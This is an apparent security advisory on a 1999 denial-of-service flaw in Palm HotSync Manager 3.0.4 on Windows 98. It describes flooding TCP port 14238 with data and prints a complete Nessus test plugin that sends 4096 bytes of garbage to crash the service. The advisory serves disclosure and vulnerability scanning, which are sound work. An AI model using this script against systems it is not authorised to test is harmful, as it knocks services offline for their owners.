‘Palm HotSync Manager is vulnerable to Denial of Service attack’

Summary

‘HotSync Manager provides network synchronization between the Palm Desktop and a remote Palm PDA that is connected via the Internet. This feature is used to backup the information from the Palm PDA to a secure location. However, using HotSync Manager over the network exposes it to an attack, where anyone with network connection to the station running HotSync Manager can crash the application and possibly execute arbitrary code.’

Credit:

‘3Com’s Palm computing team is aware of the problem and will fix this issue in the next release of the HotSync Manager.’


Details

Vulnerable systems:
HotSync Manager 3.0.4 under Windows 98

Non vulnerable systems:
HotSync Manager 3.0.4 under Windows 2000

Exploit:
By connecting to the HotSync Manager’s TCP listening port (TCP port 14238), and sending a large amount of data followed by a newline, it is possible to crash the HotSync Manager.

The following Nessus Plugin can be used to test this:
#
# This script was written by Noam Rathaus <noamr@securiteam1.com>
#
# See the Nessus Scripts License for details
#
#
if(description)
{
name[‘english’] = ‘HotSync Manager Denial of Service attack’;
script_name(english:name[‘english’]);

desc[‘english’] = ‘It is possible to cause HotSync Manager to crash by sending a few bytes
of garbage into its listening port TCP 14238.

Solution: Block those ports from outside communication

Risk factor : Low’;

script_description(english:desc[‘english’]);

summary[‘english’] = ‘HotSync Manager Denial of Service attack’;
script_summary(english:summary[‘english’]);

script_category(ACT_DENIAL);

script_copyright(english:’This script is Copyright (C) 1999 SecuriTeam’);
family[‘english’] = ‘Windows’;
script_family(english:family[‘english’]);

exit(0);
}

#
# The script code starts here
#

if (get_port_state(14238))
{
sock14238 = open_sock_tcp(14238);
if (sock14238)
{
  data_raw = crap(4096) + string(‘n’);
  send(socket:sock14238, data:data_raw);
  close(sock14238);

  sleep(5);

  sock14238_sec = open_sock_tcp(14238);
  if (sock14238_sec)
  {
   security_warning(port:14238, data:’HotSync Manager port is open.’);
  }
  else
  {
   security_hole(port:14238);
  }
}
}’

Categories: Exploits